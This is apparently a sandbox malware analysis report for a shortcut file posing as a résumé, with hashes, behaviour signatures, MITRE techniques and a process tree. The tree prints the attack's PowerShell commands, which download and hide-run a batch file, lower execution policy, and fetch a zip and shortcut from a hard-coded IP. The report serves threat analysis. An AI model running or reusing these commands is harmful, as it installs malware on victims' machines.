96e11870809d2d68c549535fbf3baceafab837b3dbbf6235abdcc89fa9503744

Analysis

max time kernel
177s
max time network
200s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
16/11/2023, 10:50

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Resume.lnk
Size

2KB
MD5

ae4c7fa63a6b59bf9c9fa3317a930da5
SHA1

5da2bcac81b4abdc4f2c9475a0f9f2edd3ef2b86
SHA256

96e11870809d2d68c549535fbf3baceafab837b3dbbf6235abdcc89fa9503744
SHA512

2ade3267f6438cc34de2a967733ec620ee13ef7e435be47ba984542844bb97db72af87006bd0cbdcd967292147c2345585eb96e4231d11e7dd9cc90b7c1a92d7

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1936	powershell.exe
10	4588	powershell.exe
28	4592	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1936	powershell.exe
1936	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
4588	powershell.exe
4588	powershell.exe
1912	powershell.exe
1912	powershell.exe
4592	powershell.exe
4592	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 3680	2904	cmd.exe	86
PID 2904 wrote to memory of 3680	2904	cmd.exe	86
PID 3680 wrote to memory of 1936	3680	cmd.exe	87
PID 3680 wrote to memory of 1936	3680	cmd.exe	87
PID 1936 wrote to memory of 1060	1936	powershell.exe	90
PID 1936 wrote to memory of 1060	1936	powershell.exe	90
PID 1060 wrote to memory of 1664	1060	cmd.exe	92
PID 1060 wrote to memory of 1664	1060	cmd.exe	92
PID 1060 wrote to memory of 4588	1060	cmd.exe	94
PID 1060 wrote to memory of 4588	1060	cmd.exe	94
PID 1060 wrote to memory of 1912	1060	cmd.exe	98
PID 1060 wrote to memory of 1912	1060	cmd.exe	98
PID 1060 wrote to memory of 4592	1060	cmd.exe	101
PID 1060 wrote to memory of 4592	1060	cmd.exe	101

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resume.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c Powershell -Command "Invoke-WebRequest 'http://18.236.82.62/init2.bat' -OutFile (Join-Path $env:APPDATA 'init2.bat'); Start-Process -WindowStyle hidden (Join-Path $env:APPDATA 'init2.bat')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'http://18.236.82.62/init2.bat' -OutFile (Join-Path $env:APPDATA 'init2.bat'); Start-Process -WindowStyle hidden (Join-Path $env:APPDATA 'init2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\init2.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell Invoke-WebRequest 'http://18.236.82.62/pyTro.zip' -OutFile "$env:APPDATA\pyTro.zip"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell Expand-Archive -Path "$env:APPDATA\pyTro.zip" -DestinationPath "$env:APPDATA"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell Invoke-WebRequest 'http://18.236.82.62/shortcut.lnk' -OutFile "$env:APPDATA\shortcut.lnk"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
09183988c4dc4e53a41c4b0256b6478b

SHA1
5cf894820772651a04308eeb6adae46781981a1e

SHA256
af7952b145408a6ea03585fb7eab63fd4327e6d15e4798102c07a5be12a7a729

SHA512
41487ff5afe0a191d8a3a6f234f4005d2951c28a349ae57d3d8e63eab53bcb4aa2988351646e6ea403ff89d4abda845cb86e1db8133f9be8d70f4cfce156c203

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94706a15a0916f9aad7dc4e6ff7e176f

SHA1
b23cdc14228c33596f7881b83974c774d2228a6e

SHA256
d76e3a2f8452c0dd242c6f0015991460c272215120e8b37b71131beb9d4599d8

SHA512
27b00ddce90cfe60ec159ac38336e1bc227540ca56f5b0286650c9f82ac466b5356dbe2346df6d43a5db7dbe0bba719d89158a3831910a6a650106494da2a996

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
96b93e9385cf171047717a1f9ea57f0b

SHA1
ec92de8bbafc934cae049e12f648debc9021d373

SHA256
9686dc9ecdaea1e208e1e26a8822a52c179ea5fe7e12af92c21c43cde173681e

SHA512
8b4d846ace09bfe6e873be5614e3e59fac9a003d8588a3b47fd81ba9702f9c3da3dc948621870414e50ed35ba278f4f021053b2c90737987f231a0adeeeb25a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njkvlow0.wx1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\init2.bat

Filesize
481B

MD5
e5e2b57c03f6cda02f32b2c83743df41

SHA1
2e085a5899ae592e13bb99179a848b848231cd3b

SHA256
a200d857676bd6e0fde5095657ea4834bf7d19d53d32d6087a7d905f3c018b75

SHA512
9532d5173ea6d35a85ce5fc4df0a72549b32455d2a9a94343bdb90432f687d965ce5a36dccf5a069c67a2f11a3b37e4e5a259227458b61f72d8b50172f5c0cbe

Download Submit
C:\Users\Admin\AppData\Roaming\pyTro.zip

Filesize
6.5MB

MD5
7693d5df548ac875e650ade6ce70416b

SHA1
4e089e01120c15bdebbbd13ba215a48f1deeb3ec

SHA256
6eb4334da286fefe53257ae19ec52b8b1b76e4b0e08669c69ab301a0b4846bb3

SHA512
407573dc4d12f1ff3a6e473354b103937c8cd045e2694987c3b71a5b8466dd426f9db136afbe4402dbb8c24af05fb93a1e4520b91db0ad04e3659aa1e7634b9a

Download Submit
C:\Users\Admin\AppData\Roaming\shortcut.lnk

Filesize
1KB

MD5
252c82bd0fe21376e39e98ac958cea87

SHA1
4ba5a39c6ffb20fbc7297fa163b875e9d4553a01

SHA256
ccc9e3e905d6f424400441e5827d62152ae86f970faaedb574841ddb3dd68597

SHA512
33deb4eb7be1676ab0c7ebc658a966c8edddd0f309b091919a821cb4c00e0d4fde40609e48106e85ed350c5b561453d9a9c81411248fe613f2ae68bdd50f2498

Download Submit
memory/1664-21-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1664-22-0x000001C8ADF10000-0x000001C8ADF20000-memory.dmp

Filesize
64KB

Download
memory/1664-23-0x000001C8ADF10000-0x000001C8ADF20000-memory.dmp

Filesize
64KB

Download
memory/1664-34-0x000001C8ADF10000-0x000001C8ADF20000-memory.dmp

Filesize
64KB

Download
memory/1664-36-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1912-67-0x0000022C7FB00000-0x0000022C7FB12000-memory.dmp

Filesize
72KB

Download
memory/1912-63-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1912-109-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1912-68-0x0000022C67500000-0x0000022C6750A000-memory.dmp

Filesize
40KB

Download
memory/1912-64-0x0000022C7FB20000-0x0000022C7FB30000-memory.dmp

Filesize
64KB

Download
memory/1912-65-0x0000022C7FB20000-0x0000022C7FB30000-memory.dmp

Filesize
64KB

Download
memory/1936-20-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1936-11-0x000002384DE70000-0x000002384DE80000-memory.dmp

Filesize
64KB

Download
memory/1936-5-0x0000023867D00000-0x0000023867D22000-memory.dmp

Filesize
136KB

Download
memory/1936-10-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/1936-12-0x000002384DE70000-0x000002384DE80000-memory.dmp

Filesize
64KB

Download
memory/4588-48-0x0000014CF4770000-0x0000014CF4780000-memory.dmp

Filesize
64KB

Download
memory/4588-37-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/4588-53-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/4588-47-0x0000014CF4770000-0x0000014CF4780000-memory.dmp

Filesize
64KB

Download
memory/4588-50-0x0000014CF4770000-0x0000014CF4780000-memory.dmp

Filesize
64KB

Download
memory/4592-110-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download
memory/4592-111-0x000001A466600000-0x000001A466610000-memory.dmp

Filesize
64KB

Download
memory/4592-112-0x000001A466600000-0x000001A466610000-memory.dmp

Filesize
64KB

Download
memory/4592-125-0x00007FFB3C0C0000-0x00007FFB3CB81000-memory.dmp

Filesize
10.8MB

Download